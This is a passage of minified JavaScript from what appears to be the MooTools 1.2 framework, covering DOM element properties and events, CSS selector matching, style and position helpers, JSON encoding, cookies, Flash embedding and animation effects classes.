}};Element.Properties.html=(function(){var c=document.createElement("div");var a={table:[1,"<table>","</table>"],select:[1,"<select>","</select>"],tbody:[2,"<table><tbody>","</tbody></table>"],tr:[3,"<table><tbody><tr>","</tr></tbody></table>"]};
a.thead=a.tfoot=a.tbody;var b={set:function(){var e=Array.flatten(arguments).join("");var f=Browser.Engine.trident&&a[this.get("tag")];if(f){var g=c;g.innerHTML=f[1]+e+f[2];
for(var d=f[0];d--;){g=g.firstChild;}this.empty().adopt(g.childNodes);}else{this.innerHTML=e;}}};b.erase=b.set;return b;})();if(Browser.Engine.webkit&&Browser.Engine.version<420){Element.Properties.text={get:function(){if(this.innerText){return this.innerText;
}var a=this.ownerDocument.newElement("div",{html:this.innerHTML}).inject(this.ownerDocument.body);var b=a.innerText;a.destroy();return b;}};}Element.Properties.events={set:function(a){this.addEvents(a);
}};Native.implement([Element,Window,Document],{addEvent:function(e,g){var h=this.retrieve("events",{});h[e]=h[e]||{keys:[],values:[]};if(h[e].keys.contains(g)){return this;
}h[e].keys.push(g);var f=e,a=Element.Events.get(e),c=g,i=this;if(a){if(a.onAdd){a.onAdd.call(this,g);}if(a.condition){c=function(j){if(a.condition.call(this,j)){return g.call(this,j);
}return true;};}f=a.base||f;}var d=function(){return g.call(i);};var b=Element.NativeEvents[f];if(b){if(b==2){d=function(j){j=new Event(j,i.getWindow());
if(c.call(i,j)===false){j.stop();}};}this.addListener(f,d);}h[e].values.push(d);return this;},removeEvent:function(c,b){var a=this.retrieve("events");if(!a||!a[c]){return this;
}var f=a[c].keys.indexOf(b);if(f==-1){return this;}a[c].keys.splice(f,1);var e=a[c].values.splice(f,1)[0];var d=Element.Events.get(c);if(d){if(d.onRemove){d.onRemove.call(this,b);
}c=d.base||c;}return(Element.NativeEvents[c])?this.removeListener(c,e):this;},addEvents:function(a){for(var b in a){this.addEvent(b,a[b]);}return this;
},removeEvents:function(a){var c;if($type(a)=="object"){for(c in a){this.removeEvent(c,a[c]);}return this;}var b=this.retrieve("events");if(!b){return this;
}if(!a){for(c in b){this.removeEvents(c);}this.eliminate("events");}else{if(b[a]){while(b[a].keys[0]){this.removeEvent(a,b[a].keys[0]);}b[a]=null;}}return this;
},fireEvent:function(d,b,a){var c=this.retrieve("events");if(!c||!c[d]){return this;}c[d].keys.each(function(e){e.create({bind:this,delay:a,"arguments":b})();
},this);return this;},cloneEvents:function(d,a){d=document.id(d);var c=d.retrieve("events");if(!c){return this;}if(!a){for(var b in c){this.cloneEvents(d,b);
}}else{if(c[a]){c[a].keys.each(function(e){this.addEvent(a,e);},this);}}return this;}});Element.NativeEvents={click:2,dblclick:2,mouseup:2,mousedown:2,contextmenu:2,mousewheel:2,DOMMouseScroll:2,mouseover:2,mouseout:2,mousemove:2,selectstart:2,selectend:2,keydown:2,keypress:2,keyup:2,focus:2,blur:2,change:2,reset:2,select:2,submit:2,load:1,unload:1,beforeunload:2,resize:1,move:1,DOMContentLoaded:1,readystatechange:1,error:1,abort:1,scroll:1};
(function(){var a=function(b){var c=b.relatedTarget;if(c==undefined){return true;}if(c===false){return false;}return($type(this)!="document"&&c!=this&&c.prefix!="xul"&&!this.hasChild(c));
};Element.Events=new Hash({mouseenter:{base:"mouseover",condition:a},mouseleave:{base:"mouseout",condition:a},mousewheel:{base:(Browser.Engine.gecko)?"DOMMouseScroll":"mousewheel"}});
})();Element.Properties.styles={set:function(a){this.setStyles(a);}};Element.Properties.opacity={set:function(a,b){if(!b){if(a==0){if(this.style.visibility!="hidden"){this.style.visibility="hidden";
}}else{if(this.style.visibility!="visible"){this.style.visibility="visible";}}}if(!this.currentStyle||!this.currentStyle.hasLayout){this.style.zoom=1;}if(Browser.Engine.trident){this.style.filter=(a==1)?"":"alpha(opacity="+a*100+")";
}this.style.opacity=a;this.store("opacity",a);},get:function(){return this.retrieve("opacity",1);}};Element.implement({setOpacity:function(a){return this.set("opacity",a,true);
},getOpacity:function(){return this.get("opacity");},setStyle:function(b,a){switch(b){case"opacity":return this.set("opacity",parseFloat(a));case"float":b=(Browser.Engine.trident)?"styleFloat":"cssFloat";
}b=b.camelCase();if($type(a)!="string"){var c=(Element.Styles.get(b)||"@").split(" ");a=$splat(a).map(function(e,d){if(!c[d]){return"";}return($type(e)=="number")?c[d].replace("@",Math.round(e)):e;
}).join(" ");}else{if(a==String(Number(a))){a=Math.round(a);}}this.style[b]=a;return this;},getStyle:function(g){switch(g){case"opacity":return this.get("opacity");
case"float":g=(Browser.Engine.trident)?"styleFloat":"cssFloat";}g=g.camelCase();var a=this.style[g];if(!$chk(a)){a=[];for(var f in Element.ShortStyles){if(g!=f){continue;
}for(var e in Element.ShortStyles[f]){a.push(this.getStyle(e));}return a.join(" ");}a=this.getComputedStyle(g);}if(a){a=String(a);var c=a.match(/rgba?\([\d\s,]+\)/);
if(c){a=a.replace(c[0],c[0].rgbToHex());}}if(Browser.Engine.presto||(Browser.Engine.trident&&!$chk(parseInt(a,10)))){if(g.test(/^(height|width)$/)){var b=(g=="width")?["left","right"]:["top","bottom"],d=0;
b.each(function(h){d+=this.getStyle("border-"+h+"-width").toInt()+this.getStyle("padding-"+h).toInt();},this);return this["offset"+g.capitalize()]-d+"px";
}if((Browser.Engine.presto)&&String(a).test("px")){return a;}if(g.test(/(border(.+)Width|margin|padding)/)){return"0px";}}return a;},setStyles:function(b){for(var a in b){this.setStyle(a,b[a]);
}return this;},getStyles:function(){var a={};Array.flatten(arguments).each(function(b){a[b]=this.getStyle(b);},this);return a;}});Element.Styles=new Hash({left:"@px",top:"@px",bottom:"@px",right:"@px",width:"@px",height:"@px",maxWidth:"@px",maxHeight:"@px",minWidth:"@px",minHeight:"@px",backgroundColor:"rgb(@, @, @)",backgroundPosition:"@px @px",color:"rgb(@, @, @)",fontSize:"@px",letterSpacing:"@px",lineHeight:"@px",clip:"rect(@px @px @px @px)",margin:"@px @px @px @px",padding:"@px @px @px @px",border:"@px @ rgb(@, @, @) @px @ rgb(@, @, @) @px @ rgb(@, @, @)",borderWidth:"@px @px @px @px",borderStyle:"@ @ @ @",borderColor:"rgb(@, @, @) rgb(@, @, @) rgb(@, @, @) rgb(@, @, @)",zIndex:"@",zoom:"@",fontWeight:"@",textIndent:"@px",opacity:"@"});
Element.ShortStyles={margin:{},padding:{},border:{},borderWidth:{},borderStyle:{},borderColor:{}};["Top","Right","Bottom","Left"].each(function(g){var f=Element.ShortStyles;
var b=Element.Styles;["margin","padding"].each(function(h){var i=h+g;f[h][i]=b[i]="@px";});var e="border"+g;f.border[e]=b[e]="@px @ rgb(@, @, @)";var d=e+"Width",a=e+"Style",c=e+"Color";
f[e]={};f.borderWidth[d]=f[e][d]=b[d]="@px";f.borderStyle[a]=f[e][a]=b[a]="@";f.borderColor[c]=f[e][c]=b[c]="rgb(@, @, @)";});(function(){Element.implement({scrollTo:function(h,i){if(b(this)){this.getWindow().scrollTo(h,i);
}else{this.scrollLeft=h;this.scrollTop=i;}return this;},getSize:function(){if(b(this)){return this.getWindow().getSize();}return{x:this.offsetWidth,y:this.offsetHeight};
},getScrollSize:function(){if(b(this)){return this.getWindow().getScrollSize();}return{x:this.scrollWidth,y:this.scrollHeight};},getScroll:function(){if(b(this)){return this.getWindow().getScroll();
}return{x:this.scrollLeft,y:this.scrollTop};},getScrolls:function(){var i=this,h={x:0,y:0};while(i&&!b(i)){h.x+=i.scrollLeft;h.y+=i.scrollTop;i=i.parentNode;
}return h;},getOffsetParent:function(){var h=this;if(b(h)){return null;}if(!Browser.Engine.trident){return h.offsetParent;}while((h=h.parentNode)&&!b(h)){if(d(h,"position")!="static"){return h;
}}return null;},getOffsets:function(){if(this.getBoundingClientRect){var m=this.getBoundingClientRect(),k=document.id(this.getDocument().documentElement),i=k.getScroll(),n=(d(this,"position")=="fixed");
return{x:parseInt(m.left,10)+((n)?0:i.x)-k.clientLeft,y:parseInt(m.top,10)+((n)?0:i.y)-k.clientTop};}var j=this,h={x:0,y:0};if(b(this)){return h;}while(j&&!b(j)){h.x+=j.offsetLeft;
h.y+=j.offsetTop;if(Browser.Engine.gecko){if(!f(j)){h.x+=c(j);h.y+=g(j);}var l=j.parentNode;if(l&&d(l,"overflow")!="visible"){h.x+=c(l);h.y+=g(l);}}else{if(j!=this&&Browser.Engine.webkit){h.x+=c(j);
h.y+=g(j);}}j=j.offsetParent;}if(Browser.Engine.gecko&&!f(this)){h.x-=c(this);h.y-=g(this);}return h;},getPosition:function(k){if(b(this)){return{x:0,y:0};
}var l=this.getOffsets(),i=this.getScrolls();var h={x:l.x-i.x,y:l.y-i.y};var j=(k&&(k=document.id(k)))?k.getPosition():{x:0,y:0};return{x:h.x-j.x,y:h.y-j.y};
},getCoordinates:function(j){if(b(this)){return this.getWindow().getCoordinates();}var h=this.getPosition(j),i=this.getSize();var k={left:h.x,top:h.y,width:i.x,height:i.y};
k.right=k.left+k.width;k.bottom=k.top+k.height;return k;},computePosition:function(h){return{left:h.x-e(this,"margin-left"),top:h.y-e(this,"margin-top")};
},setPosition:function(h){return this.setStyles(this.computePosition(h));}});Native.implement([Document,Window],{getSize:function(){if(Browser.Engine.presto||Browser.Engine.webkit){var i=this.getWindow();
return{x:i.innerWidth,y:i.innerHeight};}var h=a(this);return{x:h.clientWidth,y:h.clientHeight};},getScroll:function(){var i=this.getWindow(),h=a(this);
return{x:i.pageXOffset||h.scrollLeft,y:i.pageYOffset||h.scrollTop};},getScrollSize:function(){var i=a(this),h=this.getSize();return{x:Math.max(i.scrollWidth,h.x),y:Math.max(i.scrollHeight,h.y)};
},getPosition:function(){return{x:0,y:0};},getCoordinates:function(){var h=this.getSize();return{top:0,left:0,bottom:h.y,right:h.x,height:h.y,width:h.x};
}});var d=Element.getComputedStyle;function e(h,i){return d(h,i).toInt()||0;}function f(h){return d(h,"-moz-box-sizing")=="border-box";}function g(h){return e(h,"border-top-width");
}function c(h){return e(h,"border-left-width");}function b(h){return(/^(?:body|html)$/i).test(h.tagName);}function a(h){var i=h.getDocument();return(!i.compatMode||i.compatMode=="CSS1Compat")?i.html:i.body;
}})();Element.alias("setPosition","position");Native.implement([Window,Document,Element],{getHeight:function(){return this.getSize().y;},getWidth:function(){return this.getSize().x;
},getScrollTop:function(){return this.getScroll().y;},getScrollLeft:function(){return this.getScroll().x;},getScrollHeight:function(){return this.getScrollSize().y;
},getScrollWidth:function(){return this.getScrollSize().x;},getTop:function(){return this.getPosition().y;},getLeft:function(){return this.getPosition().x;
}});Native.implement([Document,Element],{getElements:function(h,g){h=h.split(",");var c,e={};for(var d=0,b=h.length;d<b;d++){var a=h[d],f=Selectors.Utils.search(this,a,e);
if(d!=0&&f.item){f=$A(f);}c=(d==0)?f:(c.item)?$A(c).concat(f):c.concat(f);}return new Elements(c,{ddup:(h.length>1),cash:!g});}});Element.implement({match:function(b){if(!b||(b==this)){return true;
}var d=Selectors.Utils.parseTagAndID(b);var a=d[0],e=d[1];if(!Selectors.Filters.byID(this,e)||!Selectors.Filters.byTag(this,a)){return false;}var c=Selectors.Utils.parseSelector(b);
return(c)?Selectors.Utils.filter(this,c,{}):true;}});var Selectors={Cache:{nth:{},parsed:{}}};Selectors.RegExps={id:(/#([\w-]+)/),tag:(/^(\w+|\*)/),quick:(/^(\w+|\*)$/),splitter:(/\s*([+>~\s])\s*([a-zA-Z#.*:\[])/g),combined:(/\.([\w-]+)|\[(\w+)(?:([!*^$~|]?=)(["']?)([^\4]*?)\4)?\]|:([\w-]+)(?:\(["']?(.*?)?["']?\)|$)/g)};
Selectors.Utils={chk:function(b,c){if(!c){return true;}var a=$uid(b);if(!c[a]){return c[a]=true;}return false;},parseNthArgument:function(h){if(Selectors.Cache.nth[h]){return Selectors.Cache.nth[h];
}var e=h.match(/^([+-]?\d*)?([a-z]+)?([+-]?\d*)?$/);if(!e){return false;}var g=parseInt(e[1],10);var d=(g||g===0)?g:1;var f=e[2]||false;var c=parseInt(e[3],10)||0;
if(d!=0){c--;while(c<1){c+=d;}while(c>=d){c-=d;}}else{d=c;f="index";}switch(f){case"n":e={a:d,b:c,special:"n"};break;case"odd":e={a:2,b:0,special:"n"};
break;case"even":e={a:2,b:1,special:"n"};break;case"first":e={a:0,special:"index"};break;case"last":e={special:"last-child"};break;case"only":e={special:"only-child"};
break;default:e={a:(d-1),special:"index"};}return Selectors.Cache.nth[h]=e;},parseSelector:function(e){if(Selectors.Cache.parsed[e]){return Selectors.Cache.parsed[e];
}var d,h={classes:[],pseudos:[],attributes:[]};while((d=Selectors.RegExps.combined.exec(e))){var i=d[1],g=d[2],f=d[3],b=d[5],c=d[6],j=d[7];if(i){h.classes.push(i);
}else{if(c){var a=Selectors.Pseudo.get(c);if(a){h.pseudos.push({parser:a,argument:j});}else{h.attributes.push({name:c,operator:"=",value:j});}}else{if(g){h.attributes.push({name:g,operator:f,value:b});
}}}}if(!h.classes.length){delete h.classes;}if(!h.attributes.length){delete h.attributes;}if(!h.pseudos.length){delete h.pseudos;}if(!h.classes&&!h.attributes&&!h.pseudos){h=null;
}return Selectors.Cache.parsed[e]=h;},parseTagAndID:function(b){var a=b.match(Selectors.RegExps.tag);var c=b.match(Selectors.RegExps.id);return[(a)?a[1]:"*",(c)?c[1]:false];
},filter:function(f,c,e){var d;if(c.classes){for(d=c.classes.length;d--;d){var g=c.classes[d];if(!Selectors.Filters.byClass(f,g)){return false;}}}if(c.attributes){for(d=c.attributes.length;
d--;d){var b=c.attributes[d];if(!Selectors.Filters.byAttribute(f,b.name,b.operator,b.value)){return false;}}}if(c.pseudos){for(d=c.pseudos.length;d--;d){var a=c.pseudos[d];
if(!Selectors.Filters.byPseudo(f,a.parser,a.argument,e)){return false;}}}return true;},getByTagAndID:function(b,a,d){if(d){var c=(b.getElementById)?b.getElementById(d,true):Element.getElementById(b,d,true);
return(c&&Selectors.Filters.byTag(c,a))?[c]:[];}else{return b.getElementsByTagName(a);}},search:function(o,h,t){var b=[];var c=h.trim().replace(Selectors.RegExps.splitter,function(k,j,i){b.push(j);
return":)"+i;}).split(":)");var p,e,A;for(var z=0,v=c.length;z<v;z++){var y=c[z];if(z==0&&Selectors.RegExps.quick.test(y)){p=o.getElementsByTagName(y);
continue;}var a=b[z-1];var q=Selectors.Utils.parseTagAndID(y);var B=q[0],r=q[1];if(z==0){p=Selectors.Utils.getByTagAndID(o,B,r);}else{var d={},g=[];for(var x=0,w=p.length;
x<w;x++){g=Selectors.Getters[a](g,p[x],B,r,d);}p=g;}var f=Selectors.Utils.parseSelector(y);if(f){e=[];for(var u=0,s=p.length;u<s;u++){A=p[u];if(Selectors.Utils.filter(A,f,t)){e.push(A);
}}p=e;}}return p;}};Selectors.Getters={" ":function(h,g,j,a,e){var d=Selectors.Utils.getByTagAndID(g,j,a);for(var c=0,b=d.length;c<b;c++){var f=d[c];if(Selectors.Utils.chk(f,e)){h.push(f);
}}return h;},">":function(h,g,j,a,f){var c=Selectors.Utils.getByTagAndID(g,j,a);for(var e=0,d=c.length;e<d;e++){var b=c[e];if(b.parentNode==g&&Selectors.Utils.chk(b,f)){h.push(b);
}}return h;},"+":function(c,b,a,e,d){while((b=b.nextSibling)){if(b.nodeType==1){if(Selectors.Utils.chk(b,d)&&Selectors.Filters.byTag(b,a)&&Selectors.Filters.byID(b,e)){c.push(b);
}break;}}return c;},"~":function(c,b,a,e,d){while((b=b.nextSibling)){if(b.nodeType==1){if(!Selectors.Utils.chk(b,d)){break;}if(Selectors.Filters.byTag(b,a)&&Selectors.Filters.byID(b,e)){c.push(b);
}}}return c;}};Selectors.Filters={byTag:function(b,a){return(a=="*"||(b.tagName&&b.tagName.toLowerCase()==a));},byID:function(a,b){return(!b||(a.id&&a.id==b));
},byClass:function(b,a){return(b.className&&b.className.contains(a," "));},byPseudo:function(a,d,c,b){return d.call(a,c,b);},byAttribute:function(c,d,b,e){var a=Element.prototype.getProperty.call(c,d);
if(!a){return(b=="!=");}if(!b||e==undefined){return true;}switch(b){case"=":return(a==e);case"*=":return(a.contains(e));case"^=":return(a.substr(0,e.length)==e);
case"$=":return(a.substr(a.length-e.length)==e);case"!=":return(a!=e);case"~=":return a.contains(e," ");case"|=":return a.contains(e,"-");}return false;
}};Selectors.Pseudo=new Hash({checked:function(){return this.checked;},empty:function(){return !(this.innerText||this.textContent||"").length;},not:function(a){return !Element.match(this,a);
},contains:function(a){return(this.innerText||this.textContent||"").contains(a);},"first-child":function(){return Selectors.Pseudo.index.call(this,0);},"last-child":function(){var a=this;
while((a=a.nextSibling)){if(a.nodeType==1){return false;}}return true;},"only-child":function(){var b=this;while((b=b.previousSibling)){if(b.nodeType==1){return false;
}}var a=this;while((a=a.nextSibling)){if(a.nodeType==1){return false;}}return true;},"nth-child":function(g,e){g=(g==undefined)?"n":g;var c=Selectors.Utils.parseNthArgument(g);
if(c.special!="n"){return Selectors.Pseudo[c.special].call(this,c.a,e);}var f=0;e.positions=e.positions||{};var d=$uid(this);if(!e.positions[d]){var b=this;
while((b=b.previousSibling)){if(b.nodeType!=1){continue;}f++;var a=e.positions[$uid(b)];if(a!=undefined){f=a+f;break;}}e.positions[d]=f;}return(e.positions[d]%c.a==c.b);
},index:function(a){var b=this,c=0;while((b=b.previousSibling)){if(b.nodeType==1&&++c>a){return false;}}return(c==a);},even:function(b,a){return Selectors.Pseudo["nth-child"].call(this,"2n+1",a);
},odd:function(b,a){return Selectors.Pseudo["nth-child"].call(this,"2n",a);},selected:function(){return this.selected;},enabled:function(){return(this.disabled===false);
}});Element.Events.domready={onAdd:function(a){if(Browser.loaded){a.call(this);}}};(function(){var b=function(){if(Browser.loaded){return;}Browser.loaded=true;
window.fireEvent("domready");document.fireEvent("domready");};if(Browser.Engine.trident){var a=document.createElement("div");(function(){($try(function(){a.doScroll();
return document.id(a).inject(document.body).set("html","temp").dispose();}))?b():arguments.callee.delay(50);})();}else{if(Browser.Engine.webkit&&Browser.Engine.version<525){(function(){(["loaded","complete"].contains(document.readyState))?b():arguments.callee.delay(50);
})();}else{window.addEvent("load",b);document.addEvent("DOMContentLoaded",b);}}})();var JSON=new Hash({$specialChars:{"\b":"\\b","\t":"\\t","\n":"\\n","\f":"\\f","\r":"\\r",'"':'\\"',"\\":"\\\\"},$replaceChars:function(a){return JSON.$specialChars[a]||"\\u00"+Math.floor(a.charCodeAt()/16).toString(16)+(a.charCodeAt()%16).toString(16);
},encode:function(b){switch($type(b)){case"string":return'"'+b.replace(/[\x00-\x1f\\"]/g,JSON.$replaceChars)+'"';case"array":return"["+String(b.map(JSON.encode).clean())+"]";
case"object":case"hash":var a=[];Hash.each(b,function(e,d){var c=JSON.encode(e);if(c){a.push(JSON.encode(d)+":"+c);}});return"{"+a+"}";case"number":case"boolean":return String(b);
case false:return"null";}return null;},decode:function(string,secure){if($type(string)!="string"||!string.length){return null;}if(secure&&!(/^[,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]*$/).test(string.replace(/\\./g,"@").replace(/"[^"\\\n\r]*"/g,""))){return null;
}return eval("("+string+")");}});Native.implement([Hash,Array,String,Number],{toJSON:function(){return JSON.encode(this);}});var Cookie=new Class({Implements:Options,options:{path:false,domain:false,duration:false,secure:false,document:document},initialize:function(b,a){this.key=b;
this.setOptions(a);},write:function(b){b=encodeURIComponent(b);if(this.options.domain){b+="; domain="+this.options.domain;}if(this.options.path){b+="; path="+this.options.path;
}if(this.options.duration){var a=new Date();a.setTime(a.getTime()+this.options.duration*24*60*60*1000);b+="; expires="+a.toGMTString();}if(this.options.secure){b+="; secure";
}this.options.document.cookie=this.key+"="+b;return this;},read:function(){var a=this.options.document.cookie.match("(?:^|;)\\s*"+this.key.escapeRegExp()+"=([^;]*)");
return(a)?decodeURIComponent(a[1]):null;},dispose:function(){new Cookie(this.key,$merge(this.options,{duration:-1})).write("");return this;}});Cookie.write=function(b,c,a){return new Cookie(b,a).write(c);
};Cookie.read=function(a){return new Cookie(a).read();};Cookie.dispose=function(b,a){return new Cookie(b,a).dispose();};var Swiff=new Class({Implements:[Options],options:{id:null,height:1,width:1,container:null,properties:{},params:{quality:"high",allowScriptAccess:"always",wMode:"transparent",swLiveConnect:true},callBacks:{},vars:{}},toElement:function(){return this.object;
},initialize:function(l,m){this.instance="Swiff_"+$time();this.setOptions(m);m=this.options;var b=this.id=m.id||this.instance;var a=document.id(m.container);
Swiff.CallBacks[this.instance]={};var e=m.params,g=m.vars,f=m.callBacks;var h=$extend({height:m.height,width:m.width},m.properties);var k=this;for(var d in f){Swiff.CallBacks[this.instance][d]=(function(n){return function(){return n.apply(k.object,arguments);
};})(f[d]);g[d]="Swiff.CallBacks."+this.instance+"."+d;}e.flashVars=Hash.toQueryString(g);if(Browser.Engine.trident){h.classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000";
e.movie=l;}else{h.type="application/x-shockwave-flash";h.data=l;}var j='<object id="'+b+'"';for(var i in h){j+=" "+i+'="'+h[i]+'"';}j+=">";for(var c in e){if(e[c]){j+='<param name="'+c+'" value="'+e[c]+'" />';
}}j+="</object>";this.object=((a)?a.empty():new Element("div")).set("html",j).firstChild;},replaces:function(a){a=document.id(a,true);a.parentNode.replaceChild(this.toElement(),a);
return this;},inject:function(a){document.id(a,true).appendChild(this.toElement());return this;},remote:function(){return Swiff.remote.apply(Swiff,[this.toElement()].extend(arguments));
}});Swiff.CallBacks={};Swiff.remote=function(obj,fn){var rs=obj.CallFunction('<invoke name="'+fn+'" returntype="javascript">'+__flash__argumentsToXML(arguments,2)+"</invoke>");
return eval(rs);};var Fx=new Class({Implements:[Chain,Events,Options],options:{fps:50,unit:false,duration:500,link:"ignore"},initialize:function(a){this.subject=this.subject||this;
this.setOptions(a);this.options.duration=Fx.Durations[this.options.duration]||this.options.duration.toInt();var b=this.options.wait;if(b===false){this.options.link="cancel";
}},getTransition:function(){return function(a){return -(Math.cos(Math.PI*a)-1)/2;};},step:function(){var a=$time();if(a<this.time+this.options.duration){var b=this.transition((a-this.time)/this.options.duration);
this.set(this.compute(this.from,this.to,b));}else{this.set(this.compute(this.from,this.to,1));this.complete();}},set:function(a){return a;},compute:function(c,b,a){return Fx.compute(c,b,a);
},check:function(){if(!this.timer){return true;}switch(this.options.link){case"cancel":this.cancel();return true;case"chain":this.chain(this.caller.bind(this,arguments));
return false;}return false;},start:function(b,a){if(!this.check(b,a)){return this;}this.from=b;this.to=a;this.time=0;this.transition=this.getTransition();
this.startTimer();this.onStart();return this;},complete:function(){if(this.stopTimer()){this.onComplete();}return this;},cancel:function(){if(this.stopTimer()){this.onCancel();
}return this;},onStart:function(){this.fireEvent("start",this.subject);},onComplete:function(){this.fireEvent("complete",this.subject);if(!this.callChain()){this.fireEvent("chainComplete",this.subject);
}},onCancel:function(){this.fireEvent("cancel",this.subject).clearChain();},pause:function(){this.stopTimer();return this;},resume:function(){this.startTimer();
return this;},stopTimer:function(){if(!this.timer){return false;}this.time=$time()-this.time;this.timer=$clear(this.timer);return true;},startTimer:function(){if(this.timer){return false;
}this.time=$time()-this.time;this.timer=this.step.periodical(Math.round(1000/this.options.fps),this);return true;}});Fx.compute=function(c,b,a){return(b-c)*a+c;
};Fx.Durations={"short":250,normal:500,"long":1000};Fx.CSS=new Class({Extends:Fx,prepare:function(d,e,b){b=$splat(b);var c=b[1];if(!$chk(c)){b[1]=b[0];
b[0]=d.getStyle(e);}var a=b.map(this.parse);return{from:a[0],to:a[1]};},parse:function(a){a=$lambda(a)();a=(typeof a=="string")?a.split(" "):$splat(a);
return a.map(function(c){c=String(c);var b=false;Fx.CSS.Parsers.each(function(f,e){if(b){return;}var d=f.parse(c);if($chk(d)){b={value:d,parser:f};}});
b=b||{value:c,parser:Fx.CSS.Parsers.String};return b;});},compute:function(d,c,b){var a=[];(Math.min(d.length,c.length)).times(function(e){a.push({value:d[e].parser.compute(d[e].value,c[e].value,b),parser:d[e].parser});
});a.$family={name:"fx:css:value"};return a;},serve:function(c,b){if($type(c)!="fx:css:value"){c=this.parse(c);}var a=[];c.each(function(d){a=a.concat(d.parser.serve(d.value,b));
});return a;},render:function(a,d,c,b){a.setStyle(d,this.serve(c,b));},search:function(a){if(Fx.CSS.Cache[a]){return Fx.CSS.Cache[a];}var b={};Array.each(document.styleSheets,function(e,d){var c=e.href;
if(c&&c.contains("://")&&!c.contains(document.domain)){return;}var f=e.rules||e.cssRules;Array.each(f,function(j,g){if(!j.style){return;}var h=(j.selectorText)?j.selectorText.replace(/^\w+/,function(i){return i.toLowerCase();
}):null;if(!h||!h.test("^"+a+"$")){return;}Element.Styles.each(function(k,i){if(!j.style[i]||Element.ShortStyles[i]){return;}k=String(j.style[i]);b[i]=(k.test(/^rgb/))?k.rgbToHex():k;
});});});return Fx.CSS.Cache[a]=b;}});Fx.CSS.Cache={};Fx.CSS.Parsers=new Hash({Color:{parse:function(a){if(a.match(/^#[0-9a-f]{3,6}$/i)){return a.hexToRgb(true);
}return((a=a.match(/(\d+),\s*(\d+),\s*(\d+)/)))?[a[1],a[2],a[3]]:false;},compute:function(c,b,a){return c.map(function(e,d){return Math.round(Fx.compute(c[d],b[d],a));
});},serve:function(a){return a.map(Number);}},Number:{parse:parseFloat,compute:Fx.compute,serve:function(b,a){return(a)?b+a:b;}},String:{parse:$lambda(false),compute:$arguments(1),serve:$arguments(0)}});
Fx.Tween=new Class({Extends:Fx.CSS,initialize:function(b,a){this.element=this.subject=document.id(b);this.parent(a);},set:function(b,a){if(arguments.length==1){a=b;
b=this.property||this.options.property;}this.render(this.element,b,a,this.options.unit);return this;},start:function(c,e,d){if(!this.check(c,e,d)){return this;
}var b=Array.flatten(arguments);this.property=this.options.property||b.shift();var a=this.prepare(this.element,this.property,b);return this.parent(a.from,a.to);
}});Element.Properties.tween={set:function(a){var b=this.retrieve("tween");if(b){b.cancel();}return this.eliminate("tween").store("tween:options",$extend({link:"cancel"},a));
},get:function(a){if(a||!this.retrieve("tween")){if(a||!this.retrieve("tween:options")){this.set("tween",a);}this.store("tween",new Fx.Tween(this,this.retrieve("tween:options")));
}return this.retrieve("tween");}};Element.implement({tween:function(a,c,b){this.get("tween").start(arguments);return this;},fade:function(c){var e=this.get("tween"),d="opacity",a;
c=$pick(c,"toggle");switch(c){case"in":e.start(d,1);break;case"out":e.start(d,0);break;case"show":e.set(d,1);break;case"hide":e.set(d,0);break;case"toggle":var b=this.retrieve("fade:flag",this.get("opacity")==1);
e.start(d,(b)?0:1);this.store("fade:flag",!b);a=true;break;default:e.start(d,arguments);}if(!a){this.eliminate("fade:flag");}return this;},highlight:function(c,a){if(!a){a=this.retrieve("highlight:original",this.getStyle("background-color"));
a=(a=="transparent")?"#fff":a;}var b=this.get("tween");b.start("background-color",c||"#ffff88",a).chain(function(){this.setStyle("background-color",this.retrieve("highlight:original"));
b.callChain();}.bind(this));return this;}});Fx.Morph=new Class({Extends:Fx.CSS,initialize:function(b,a){this.element=this.subject=document.id(b);this.parent(a);
},set:function(a){if(typeof a=="string"){a=this.search(a);}for(var b in a){this.render(this.element,b,a[b],this.options.unit);}return this;},compute:function(e,d,c){var a={};
for(var b in e){a[b]=this.parent(e[b],d[b],c);}return a;},start:function(b){if(!this.check(b)){return this;}if(typeof b=="string"){b=this.search(b);}var e={},d={};
for(var c in b){var a=this.prepare(this.element,c,b[c]);e[c]=a.from;d[c]=a.to;}return this.parent(e,d);}});Element.Properties.morph={set:function(a){var b=this.retrieve("morph");
if(b){b.cancel();}return this.eliminate("morph").store("morph:options",$extend({link:"cancel"},a));},get:function(a){if(a||!this.retrieve("morph")){if(a||!this.retrieve("morph:options")){this.set("morph",a);
}this.store("morph",new Fx.Morph(this,this.retrieve("morph:options")));}return this.retrieve("morph");}};Element.implement({morph:function(a){this.get("morph").start(a);
return this;}});Fx.implement({getTransition:function(){var a=this.options.transition||Fx.Transitions.Sine.easeInOut;if(typeof a=="string"){var b=a.split(":");
a=Fx.Transitions;a=a[b[0]]||a[b[0].capitalize()];if(b[1]){a=a["ease"+b[1].capitalize()+(b[2]?b[2].capitalize():"")];}}return a;}});Fx.Transition=function(b,a){a=$splat(a);
return $extend(b,{easeIn:function(c){return b(c,a);},easeOut:function(c){return 1-b(1-c,a);},easeInOut:function(c){return(c<=0.5)?b(2*c,a)/2:(2-b(2*(1-c),a))/2;
}});};Fx.Transitions=new Hash({linear:$arguments(0)});Fx.Transitions.extend=function(a){for(var b in a){Fx.Transitions[b]=new Fx.Transition(a[b]);}};Fx.Transitions.extend({Pow:function(b,a){return Math.pow(b,a[0]||6);
},Expo:function(a){return Math.pow(2,8*(a-1));},Circ:function(a){return 1-Math.sin(Math.acos(a));},Sine:function(a){return 1-Math.sin((1-a)*Math.PI/2);
},Back:function(b,a){a=a[0]||1.618;return Math.pow(b,2)*((a+1)*b-a);},Bounce:function(f){var e;for(var d=0,c=1;1;d+=c,c/=2){if(f>=(7-4*d)/11){e=c*c-Math.pow((11-6*d-11*f)/4,2);
break;}}return e;},Elastic:function(b,a){return Math.pow(2,10*--b)*Math.cos(20*b*Math.PI*(a[0]||1)/3);}});["Quad","Cubic","Quart","Quint"].each(function(b,a){Fx.Transitions[b]=new Fx.Transition(function(c){return Math.pow(c,[a+2]);
});});var Request=new Class({Implements:[Chain,Events,Options],options:{url:"",data:"",headers:{"X-Requested-With":"XMLHttpRequest",Accept:"text/javascript, text/html, application/xml, text/xml, */*"},async:true,format:false,method:"post",link:"ignore",isSuccess:null,emulation:true,urlEncoded:true,encoding:"utf-8",evalScripts:false,evalResponse:false,noCache:false},initialize:function(a){this.xhr=new Browser.Request();
this.setOptions(a);this.options.isSuccess=this.options.isSuccess||this.isSuccess;this.headers=new Hash(this.options.headers);},onStateChange:function(){if(this.xhr.readyState!=4||!this.running){return;
